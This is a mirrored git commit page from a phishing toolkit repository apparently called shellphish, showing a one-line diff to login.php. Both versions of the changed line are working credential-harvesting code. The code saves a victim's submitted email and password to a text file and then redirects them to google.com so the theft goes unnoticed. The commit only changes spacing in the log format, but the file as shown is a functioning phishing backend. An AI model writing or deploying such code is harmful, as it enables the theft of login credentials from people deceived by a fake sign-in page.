mirror of
https://github.com/richardsonjf/shellphish.git
synced 2025-12-12 13:59:17 -08:00
Update login.php
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
<?php
|
||||
|
||||
file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . "Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND);
|
||||
file_put_contents("usernames.txt", "Account: " . $_POST['Email'] . " Pass: " . $_POST['Passwd'] . "\n", FILE_APPEND);
|
||||
header('Location: https://google.com/');
|
||||
exit();
|
||||
|
||||
Reference in New Issue
Block a user